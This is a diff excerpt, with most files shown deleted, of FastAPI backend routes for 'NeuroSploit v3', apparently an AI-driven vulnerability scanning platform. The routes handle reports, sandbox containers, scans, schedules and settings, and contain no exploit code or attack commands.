media_type=media_types.get(format, "application/octet-stream"),
filename=file_path.name
)
@router.get("/{report_id}/download-zip")
async def download_report_zip(
report_id: str,
db: AsyncSession = Depends(get_db)
):
"""Download report as ZIP with screenshots included"""
import zipfile
import tempfile
import hashlib
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found for report")
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Generate HTML report
generator = ReportGenerator()
report_path, _ = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format="html",
title=report.title
)
# Collect screenshots (use absolute path via settings.BASE_DIR)
# Check scan-scoped path first, then legacy flat path
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
scan_id_str = str(scan.id) if scan else None
screenshot_files = []
for vuln in vulnerabilities:
# Finding ID is md5(vuln_type+url+param)[:8]
vuln_url = getattr(vuln, 'url', None) or vuln.affected_endpoint or ''
vuln_param = getattr(vuln, 'parameter', None) or getattr(vuln, 'poc_parameter', None) or ''
finding_id = hashlib.md5(
f"{vuln.vulnerability_type}{vuln_url}{vuln_param}".encode()
).hexdigest()[:8]
# Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
finding_dir = None
if scan_id_str:
scan_dir = screenshots_base / scan_id_str / finding_id
if scan_dir.exists():
finding_dir = scan_dir
if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for img in finding_dir.glob("*.png"):
screenshot_files.append((img, f"screenshots/{finding_id}/{img.name}"))
# Also include base64 screenshots from DB as files in the ZIP
db_screenshots = getattr(vuln, 'screenshots', None) or []
for idx, ss in enumerate(db_screenshots):
if isinstance(ss, str) and ss.startswith("data:image/"):
# Will be embedded in HTML, but also save as file
import base64 as b64
try:
b64_data = ss.split(",", 1)[1]
img_bytes = b64.b64decode(b64_data)
img_name = f"screenshots/{finding_id}/evidence_{idx+1}.png"
# Write to temp for ZIP inclusion
tmp_img = Path(tempfile.gettempdir()) / f"ss_{finding_id}_{idx}.png"
tmp_img.write_bytes(img_bytes)
screenshot_files.append((tmp_img, img_name))
except Exception:
pass
# Create ZIP
zip_name = Path(report_path).stem + ".zip"
zip_path = Path(tempfile.gettempdir()) / zip_name
with zipfile.ZipFile(str(zip_path), 'w', zipfile.ZIP_DEFLATED) as zf:
zf.write(report_path, "report.html")
for src_path, arc_name in screenshot_files:
zf.write(str(src_path), arc_name)
return FileResponse(
path=str(zip_path),
media_type="application/zip",
filename=zip_name
)
@router.delete("/{report_id}")
async def delete_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a report"""
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
# Delete file if exists
if report.file_path:
file_path = Path(report.file_path)
if file_path.exists():
file_path.unlink()
await db.delete(report)
await db.commit()
return {"message": "Report deleted"}
-130
View File
@@ -1,130 +0,0 @@
"""
NeuroSploit v3 - Sandbox Container Management API
Real-time monitoring and management of per-scan Kali Linux containers.
"""
from datetime import datetime
from fastapi import APIRouter, HTTPException
router = APIRouter()
def _docker_available() -> bool:
try:
import docker
docker.from_env().ping()
return True
except Exception:
return False
@router.get("/")
async def list_sandboxes():
"""List all sandbox containers with pool status."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
return {
"pool": {
"active": 0,
"max_concurrent": 0,
"image": "neurosploit-kali:latest",
"container_ttl_minutes": 60,
"docker_available": _docker_available(),
},
"containers": [],
"error": str(e),
}
sandboxes = pool.list_sandboxes()
now = datetime.utcnow()
containers = []
for info in sandboxes.values():
created = info.get("created_at")
uptime = 0.0
if created:
try:
dt = datetime.fromisoformat(created)
uptime = (now - dt).total_seconds()
except Exception:
pass
containers.append({
**info,
"uptime_seconds": uptime,
})
return {
"pool": {
"active": pool.active_count,
"max_concurrent": pool.max_concurrent,
"image": pool.image,
"container_ttl_minutes": int(pool.container_ttl.total_seconds() / 60),
"docker_available": _docker_available(),
},
"containers": containers,
}
@router.get("/{scan_id}")
async def get_sandbox(scan_id: str):
"""Get health check for a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
sb = pool._sandboxes.get(scan_id)
if not sb:
raise HTTPException(status_code=404, detail=f"Sandbox instance not found")
health = await sb.health_check()
return health
@router.delete("/{scan_id}")
async def destroy_sandbox(scan_id: str):
"""Destroy a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
await pool.destroy(scan_id)
return {"message": f"Sandbox for scan {scan_id} destroyed", "scan_id": scan_id}
@router.post("/cleanup")
async def cleanup_expired():
"""Remove containers that have exceeded their TTL."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_expired()
return {"message": "Expired containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
@router.post("/cleanup-orphans")
async def cleanup_orphans():
"""Remove orphan containers not tracked by the pool."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_orphans()
return {"message": "Orphan containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
-656
View File
@@ -1,656 +0,0 @@
"""
NeuroSploit v3 - Scans API Endpoints
"""
from typing import List, Optional
from datetime import datetime
from fastapi import APIRouter, Depends, HTTPException, BackgroundTasks
from pydantic import BaseModel
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from urllib.parse import urlparse
from backend.db.database import get_db
from backend.models import Scan, Target, Endpoint, Vulnerability
from backend.schemas.scan import ScanCreate, ScanUpdate, ScanResponse, ScanListResponse, ScanProgress
from backend.services.scan_service import run_scan_task, skip_to_phase as _skip_to_phase, PHASE_ORDER
router = APIRouter()
@router.get("", response_model=ScanListResponse)
async def list_scans(
page: int = 1,
per_page: int = 10,
status: Optional[str] = None,
db: AsyncSession = Depends(get_db)
):
"""List all scans with pagination"""
query = select(Scan).order_by(Scan.created_at.desc())
if status:
query = query.where(Scan.status == status)
# Get total count
count_query = select(func.count()).select_from(Scan)
if status:
count_query = count_query.where(Scan.status == status)
total_result = await db.execute(count_query)
total = total_result.scalar()
# Apply pagination
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
scans = result.scalars().all()
# Load targets for each scan
scan_responses = []
for scan in scans:
targets_query = select(Target).where(Target.scan_id == scan.id)
targets_result = await db.execute(targets_query)
targets = targets_result.scalars().all()
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
scan_responses.append(ScanResponse(**scan_dict))
return ScanListResponse(
scans=scan_responses,
total=total,
page=page,
per_page=per_page
)
@router.post("", response_model=ScanResponse)
async def create_scan(
scan_data: ScanCreate,
background_tasks: BackgroundTasks,
db: AsyncSession = Depends(get_db)
):
"""Create a new scan with optional authentication for authenticated testing"""
# Process authentication config
auth_type = None
auth_credentials = None
if scan_data.auth:
auth_type = scan_data.auth.auth_type
auth_credentials = {}
if scan_data.auth.cookie:
auth_credentials["cookie"] = scan_data.auth.cookie
if scan_data.auth.bearer_token:
auth_credentials["bearer_token"] = scan_data.auth.bearer_token
if scan_data.auth.username:
auth_credentials["username"] = scan_data.auth.username
if scan_data.auth.password:
auth_credentials["password"] = scan_data.auth.password
if scan_data.auth.header_name and scan_data.auth.header_value:
auth_credentials["header_name"] = scan_data.auth.header_name
auth_credentials["header_value"] = scan_data.auth.header_value
# Create scan
scan = Scan(
name=scan_data.name or f"Scan {datetime.now().strftime('%Y-%m-%d %H:%M')}",
scan_type=scan_data.scan_type,
recon_enabled=scan_data.recon_enabled,
custom_prompt=scan_data.custom_prompt,
prompt_id=scan_data.prompt_id,
config=scan_data.config,
auth_type=auth_type,
auth_credentials=auth_credentials,
custom_headers=scan_data.custom_headers,
status="pending"
)
db.add(scan)
await db.flush()
# Create targets
targets = []
for url in scan_data.targets:
parsed = urlparse(url)
target = Target(
scan_id=scan.id,
url=url,
hostname=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == "https" else 80),
protocol=parsed.scheme or "https",
path=parsed.path or "/"
)
db.add(target)
targets.append(target)
await db.commit()
await db.refresh(scan)
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
return ScanResponse(**scan_dict)
@router.get("/{scan_id}", response_model=ScanResponse)
async def get_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan details by ID"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Load targets
targets_result = await db.execute(select(Target).where(Target.scan_id == scan_id))
targets = targets_result.scalars().all()
scan_dict = scan.to_dict()
scan_dict["targets"] = [t.to_dict() for t in targets]
return ScanResponse(**scan_dict)
@router.post("/{scan_id}/start")
async def start_scan(
scan_id: str,
background_tasks: BackgroundTasks,
db: AsyncSession = Depends(get_db)
):
"""Start a scan execution"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status == "running":
raise HTTPException(status_code=400, detail="Scan is already running")
# Update scan status
scan.status = "running"
scan.started_at = datetime.utcnow()
scan.current_phase = "initializing"
scan.progress = 0
await db.commit()
# Start scan in background with its own database session
background_tasks.add_task(run_scan_task, scan_id)
return {"message": "Scan started", "scan_id": scan_id}
@router.post("/{scan_id}/stop")
async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Stop a running scan and save partial results"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# Signal the running agent to stop
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].cancel()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "stopped"
agent_results[agent_id]["phase"] = "stopped"
# Update scan status
scan.status = "stopped"
scan.completed_at = datetime.utcnow()
scan.current_phase = "stopped"
# Calculate duration
if scan.started_at:
duration = (scan.completed_at - scan.started_at).total_seconds()
scan.duration = int(duration)
# Compute final vulnerability statistics from database
for severity in ["critical", "high", "medium", "low", "info"]:
count_result = await db.execute(
select(func.count()).select_from(Vulnerability)
.where(Vulnerability.scan_id == scan_id)
.where(Vulnerability.severity == severity)
)
setattr(scan, f"{severity}_count", count_result.scalar() or 0)
# Get total vulnerability count
total_vuln_result = await db.execute(
select(func.count()).select_from(Vulnerability)
.where(Vulnerability.scan_id == scan_id)
)
scan.total_vulnerabilities = total_vuln_result.scalar() or 0
# Get total endpoint count
total_endpoint_result = await db.execute(
select(func.count()).select_from(Endpoint)
.where(Endpoint.scan_id == scan_id)
)
scan.total_endpoints = total_endpoint_result.scalar() or 0
await db.commit()
# Build summary for WebSocket broadcast
summary = {
"total_endpoints": scan.total_endpoints,
"total_vulnerabilities": scan.total_vulnerabilities,
"critical": scan.critical_count,
"high": scan.high_count,
"medium": scan.medium_count,
"low": scan.low_count,
"info": scan.info_count,
"duration": scan.duration,
"progress": scan.progress
}
# Broadcast stop event via WebSocket
await ws_manager.broadcast_scan_stopped(scan_id, summary)
await ws_manager.broadcast_log(scan_id, "warning", "Scan stopped by user")
await ws_manager.broadcast_log(scan_id, "info", f"Partial results: {scan.total_vulnerabilities} vulnerabilities found")
# Auto-generate partial report
report_data = None
try:
from backend.services.report_service import auto_generate_report
await ws_manager.broadcast_log(scan_id, "info", "Generating partial report...")
report = await auto_generate_report(db, scan_id, is_partial=True)
report_data = report.to_dict()
await ws_manager.broadcast_log(scan_id, "info", f"Partial report generated: {report.title}")
except Exception as report_error:
await ws_manager.broadcast_log(scan_id, "warning", f"Failed to generate partial report: {str(report_error)}")
return {
"message": "Scan stopped",
"scan_id": scan_id,
"summary": summary,
"report": report_data
}
@router.post("/{scan_id}/pause")
async def pause_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Pause a running scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "running":
raise HTTPException(status_code=400, detail="Scan is not running")
# Signal the agent to pause
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].pause()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "paused"
agent_results[agent_id]["phase"] = "paused"
scan.status = "paused"
scan.current_phase = "paused"
await db.commit()
await ws_manager.broadcast_log(scan_id, "warning", "Scan paused by user")
return {"message": "Scan paused", "scan_id": scan_id}
@router.post("/{scan_id}/resume")
async def resume_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Resume a paused scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "paused":
raise HTTPException(status_code=400, detail="Scan is not paused")
# Signal the agent to resume
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = "testing"
scan.status = "running"
scan.current_phase = "testing"
await db.commit()
await ws_manager.broadcast_log(scan_id, "info", "Scan resumed by user")
return {"message": "Scan resumed", "scan_id": scan_id}
@router.post("/{scan_id}/skip-to/{target_phase}")
async def skip_to_phase_endpoint(scan_id: str, target_phase: str, db: AsyncSession = Depends(get_db)):
"""Skip the current scan phase and jump to a target phase.
Valid phases: recon, analyzing, testing, completed
Can only skip forward (to a phase ahead of current).
"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# If paused, resume first so the skip can be processed
if scan.status == "paused":
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = agent_results[agent_id].get("last_phase", "testing")
scan.status = "running"
await db.commit()
if target_phase not in PHASE_ORDER:
raise HTTPException(
status_code=400,
detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(PHASE_ORDER[1:])}"
)
# Validate forward skip
current_idx = PHASE_ORDER.index(scan.current_phase) if scan.current_phase in PHASE_ORDER else 0
target_idx = PHASE_ORDER.index(target_phase)
if target_idx <= current_idx:
raise HTTPException(
status_code=400,
detail=f"Cannot skip backward. Current: {scan.current_phase}, target: {target_phase}"
)
# Signal the running scan to skip
success = _skip_to_phase(scan_id, target_phase)
if not success:
raise HTTPException(status_code=500, detail="Failed to signal phase skip")
# Broadcast via WebSocket
from backend.api.websocket import manager as ws_manager
await ws_manager.broadcast_log(scan_id, "warning", f">> User requested skip to phase: {target_phase}")
await ws_manager.broadcast_phase_change(scan_id, f"skipping_to_{target_phase}")
return {
"message": f"Skipping to phase: {target_phase}",
"scan_id": scan_id,
"from_phase": scan.current_phase,
"target_phase": target_phase
}
@router.get("/{scan_id}/status", response_model=ScanProgress)
async def get_scan_status(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan progress and status"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
return ScanProgress(
scan_id=scan.id,
status=scan.status,
progress=scan.progress,
current_phase=scan.current_phase,
total_endpoints=scan.total_endpoints,
total_vulnerabilities=scan.total_vulnerabilities
)
@router.delete("/{scan_id}")
async def delete_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status == "running":
raise HTTPException(status_code=400, detail="Cannot delete running scan")
await db.delete(scan)
await db.commit()
return {"message": "Scan deleted", "scan_id": scan_id}
@router.get("/{scan_id}/endpoints")
async def get_scan_endpoints(
scan_id: str,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""Get endpoints discovered in a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
query = select(Endpoint).where(Endpoint.scan_id == scan_id).order_by(Endpoint.discovered_at.desc())
# Count
count_result = await db.execute(select(func.count()).select_from(Endpoint).where(Endpoint.scan_id == scan_id))
total = count_result.scalar()
# Paginate
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
endpoints = result.scalars().all()
return {
"endpoints": [e.to_dict() for e in endpoints],
"total": total,
"page": page,
"per_page": per_page
}
@router.get("/{scan_id}/vulnerabilities")
async def get_scan_vulnerabilities(
scan_id: str,
severity: Optional[str] = None,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""Get vulnerabilities found in a scan"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
query = select(Vulnerability).where(Vulnerability.scan_id == scan_id)
if severity:
query = query.where(Vulnerability.severity == severity)
query = query.order_by(Vulnerability.created_at.desc())
# Count
count_query = select(func.count()).select_from(Vulnerability).where(Vulnerability.scan_id == scan_id)
if severity:
count_query = count_query.where(Vulnerability.severity == severity)
count_result = await db.execute(count_query)
total = count_result.scalar()
# Paginate
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
vulnerabilities = result.scalars().all()
return {
"vulnerabilities": [v.to_dict() for v in vulnerabilities],
"total": total,
"page": page,
"per_page": per_page
}
class ValidationRequest(BaseModel):
validation_status: str # "validated" | "false_positive" | "ai_confirmed" | "ai_rejected" | "pending_review"
notes: Optional[str] = None
@router.patch("/vulnerabilities/{vuln_id}/validate")
async def validate_vulnerability(
vuln_id: str,
body: ValidationRequest,
db: AsyncSession = Depends(get_db)
):
"""Manually validate or reject a vulnerability finding"""
valid_statuses = {"validated", "false_positive", "ai_confirmed", "ai_rejected", "pending_review"}
if body.validation_status not in valid_statuses:
raise HTTPException(status_code=400, detail=f"Invalid status. Must be one of: {', '.join(valid_statuses)}")
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
old_status = vuln.validation_status or "ai_confirmed"
vuln.validation_status = body.validation_status
if body.notes:
vuln.ai_rejection_reason = body.notes
# Update scan severity counts when validation status changes
scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
scan = scan_result.scalar_one_or_none()
if scan:
sev = vuln.severity
# If changing from rejected to validated: add to counts
if old_status == "ai_rejected" and body.validation_status == "validated":
scan.total_vulnerabilities = (scan.total_vulnerabilities or 0) + 1
if sev == "critical":
scan.critical_count = (scan.critical_count or 0) + 1
elif sev == "high":
scan.high_count = (scan.high_count or 0) + 1
elif sev == "medium":
scan.medium_count = (scan.medium_count or 0) + 1
elif sev == "low":
scan.low_count = (scan.low_count or 0) + 1
elif sev == "info":
scan.info_count = (scan.info_count or 0) + 1
# If changing from confirmed to false_positive: subtract from counts
elif old_status in ("ai_confirmed", "validated") and body.validation_status == "false_positive":
scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) - 1)
if sev == "critical":
scan.critical_count = max(0, (scan.critical_count or 0) - 1)
elif sev == "high":
scan.high_count = max(0, (scan.high_count or 0) - 1)
elif sev == "medium":
scan.medium_count = max(0, (scan.medium_count or 0) - 1)
elif sev == "low":
scan.low_count = max(0, (scan.low_count or 0) - 1)
elif sev == "info":
scan.info_count = max(0, (scan.info_count or 0) - 1)
await db.commit()
return {"message": "Vulnerability validation updated", "vulnerability": vuln.to_dict()}
# --- Adaptive Learning Feedback ---
class FeedbackRequest(BaseModel):
is_true_positive: bool
explanation: str = ""
@router.post("/vulnerabilities/{vuln_id}/feedback")
async def submit_vulnerability_feedback(
vuln_id: str,
body: FeedbackRequest,
db: AsyncSession = Depends(get_db)
):
"""Submit TP/FP feedback for a vulnerability finding.
Records feedback in the adaptive learner so the agent improves over time.
Also updates the validation_status in the database.
"""
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
if len(body.explanation) < 3 and not body.is_true_positive:
raise HTTPException(status_code=400, detail="Explanation required for false positive feedback (min 3 chars)")
# Update DB validation status
vuln.validation_status = "validated" if body.is_true_positive else "false_positive"
if body.explanation:
vuln.ai_rejection_reason = body.explanation
# Update scan counts
scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
scan = scan_result.scalar_one_or_none()
if scan and not body.is_true_positive:
sev = vuln.severity
scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) - 1)
count_attr = f"{sev}_count"
if hasattr(scan, count_attr):
setattr(scan, count_attr, max(0, (getattr(scan, count_attr) or 0) - 1))
await db.commit()
# Record in adaptive learner
pattern_count = 0
try:
from backend.core.adaptive_learner import AdaptiveLearner
learner = AdaptiveLearner()
vuln_dict = vuln.to_dict()
learner.record_feedback(
vuln_id=vuln_id,
vuln_type=vuln_dict.get("vuln_type", "unknown"),
endpoint=vuln_dict.get("url", ""),
param=vuln_dict.get("parameter", ""),
payload=vuln_dict.get("payload", ""),
is_tp=body.is_true_positive,
explanation=body.explanation,
severity=vuln_dict.get("severity", "medium"),
domain=vuln_dict.get("url", ""),
)
stats = learner.get_stats()
pattern_count = stats.get("total_patterns", 0)
except Exception as e:
logger.warning(f"Adaptive learner feedback failed: {e}")
return {
"message": "Feedback recorded",
"vulnerability_id": vuln_id,
"is_true_positive": body.is_true_positive,
"pattern_count": pattern_count,
}
@router.get("/vulnerabilities/learning/stats")
async def get_learning_stats():
"""Get adaptive learning statistics."""
try:
from backend.core.adaptive_learner import AdaptiveLearner
learner = AdaptiveLearner()
return learner.get_stats()
except Exception as e:
return {"error": str(e), "total_feedback": 0, "total_patterns": 0}
-140
View File
@@ -1,140 +0,0 @@
"""
NeuroSploit v3 - Scheduler API Router
CRUD endpoints for managing scheduled scan jobs.
"""
import json
from pathlib import Path
from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel
from typing import Optional, List, Dict
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
class ScheduleJobRequest(BaseModel):
"""Request model for creating a scheduled job."""
job_id: str
target: str
scan_type: str = "quick"
cron_expression: Optional[str] = None
interval_minutes: Optional[int] = None
agent_role: Optional[str] = None
llm_profile: Optional[str] = None
class ScheduleJobResponse(BaseModel):
"""Response model for a scheduled job."""
id: str
target: str
scan_type: str
schedule: str
status: str
next_run: Optional[str] = None
last_run: Optional[str] = None
run_count: int = 0
@router.get("/", response_model=List[Dict])
async def list_scheduled_jobs(request: Request):
"""List all scheduled scan jobs."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
return []
return scheduler.list_jobs()
@router.post("/", response_model=Dict)
async def create_scheduled_job(job: ScheduleJobRequest, request: Request):
"""Create a new scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
if not job.cron_expression and not job.interval_minutes:
raise HTTPException(
status_code=400,
detail="Either cron_expression or interval_minutes must be provided"
)
result = scheduler.add_job(
job_id=job.job_id,
target=job.target,
scan_type=job.scan_type,
cron_expression=job.cron_expression,
interval_minutes=job.interval_minutes,
agent_role=job.agent_role,
llm_profile=job.llm_profile
)
if "error" in result:
raise HTTPException(status_code=400, detail=result["error"])
return result
@router.delete("/{job_id}")
async def delete_scheduled_job(job_id: str, request: Request):
"""Delete a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.remove_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' deleted", "id": job_id}
@router.post("/{job_id}/pause")
async def pause_scheduled_job(job_id: str, request: Request):
"""Pause a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.pause_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' paused", "id": job_id, "status": "paused"}
@router.post("/{job_id}/resume")
async def resume_scheduled_job(job_id: str, request: Request):
"""Resume a paused scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.resume_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' resumed", "id": job_id, "status": "active"}
@router.get("/agent-roles", response_model=List[Dict])
async def get_agent_roles():
"""Return available agent roles from config.json for scheduler dropdown."""
try:
if not CONFIG_PATH.exists():
return []
config = json.loads(CONFIG_PATH.read_text())
roles = config.get("agent_roles", {})
result = []
for role_id, role_data in roles.items():
if role_data.get("enabled", True):
result.append({
"id": role_id,
"name": role_id.replace("_", " ").title(),
"description": role_data.get("description", ""),
"tools": role_data.get("tools_allowed", []),
})
return result
except Exception:
return []
-727
View File
@@ -1,727 +0,0 @@
"""
NeuroSploit v3 - Settings API Endpoints
"""
import os
import re
import time
from pathlib import Path
from typing import Optional, Dict, List
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, delete, text
from pydantic import BaseModel
from backend.db.database import get_db, engine
from backend.models import Scan, Target, Endpoint, Vulnerability, VulnerabilityTest, Report
router = APIRouter()
# Path to .env file (project root)
ENV_FILE_PATH = Path(__file__).parent.parent.parent.parent / ".env"
def _update_env_file(updates: Dict[str, str]) -> bool:
"""
Update key=value pairs in the .env file without breaking formatting.
- If the key exists (even commented out), update its value
- If the key doesn't exist, append it
- Preserves comments and blank lines
"""
if not ENV_FILE_PATH.exists():
return False
try:
lines = ENV_FILE_PATH.read_text().splitlines()
updated_keys = set()
new_lines = []
for line in lines:
stripped = line.strip()
matched = False
for key, value in updates.items():
# Match: KEY=..., # KEY=..., #KEY=...
pattern = rf'^#?\s*{re.escape(key)}\s*='
if re.match(pattern, stripped):
# Replace with uncommented key=value
new_lines.append(f"{key}={value}")
updated_keys.add(key)
matched = True
break
if not matched:
new_lines.append(line)
# Append any keys that weren't found in existing file
for key, value in updates.items():
if key not in updated_keys:
new_lines.append(f"{key}={value}")
# Write back with trailing newline
ENV_FILE_PATH.write_text("\n".join(new_lines) + "\n")
return True
except Exception as e:
print(f"Warning: Failed to update .env file: {e}")
return False
class SettingsUpdate(BaseModel):
"""Settings update schema"""
llm_provider: Optional[str] = None
llm_model: Optional[str] = None
anthropic_api_key: Optional[str] = None
openai_api_key: Optional[str] = None
nim_api_key: Optional[str] = None
openrouter_api_key: Optional[str] = None
gemini_api_key: Optional[str] = None
together_api_key: Optional[str] = None
fireworks_api_key: Optional[str] = None
ollama_base_url: Optional[str] = None
lmstudio_base_url: Optional[str] = None
max_concurrent_scans: Optional[int] = None
aggressive_mode: Optional[bool] = None
default_scan_type: Optional[str] = None
recon_enabled_by_default: Optional[bool] = None
enable_model_routing: Optional[bool] = None
enable_knowledge_augmentation: Optional[bool] = None
enable_browser_validation: Optional[bool] = None
max_output_tokens: Optional[int] = None
# Notifications
enable_notifications: Optional[bool] = None
discord_webhook_url: Optional[str] = None
telegram_bot_token: Optional[str] = None
telegram_chat_id: Optional[str] = None
twilio_account_sid: Optional[str] = None
twilio_auth_token: Optional[str] = None
twilio_from_number: Optional[str] = None
twilio_to_number: Optional[str] = None
notification_severity_filter: Optional[str] = None
class SettingsResponse(BaseModel):
"""Settings response schema"""
llm_provider: str = "claude"
llm_model: str = ""
has_anthropic_key: bool = False
has_openai_key: bool = False
has_nim_key: bool = False
has_openrouter_key: bool = False
has_gemini_key: bool = False
has_together_key: bool = False
has_fireworks_key: bool = False
ollama_base_url: str = ""
lmstudio_base_url: str = ""
max_concurrent_scans: int = 3
aggressive_mode: bool = False
default_scan_type: str = "full"
recon_enabled_by_default: bool = True
enable_model_routing: bool = False
enable_knowledge_augmentation: bool = False
enable_browser_validation: bool = False
max_output_tokens: Optional[int] = None
# Notifications
enable_notifications: bool = False
has_discord_webhook: bool = False
has_telegram_bot: bool = False
has_twilio_credentials: bool = False
notification_severity_filter: str = "critical,high"
class ModelInfo(BaseModel):
"""Info about an available LLM model"""
provider: str
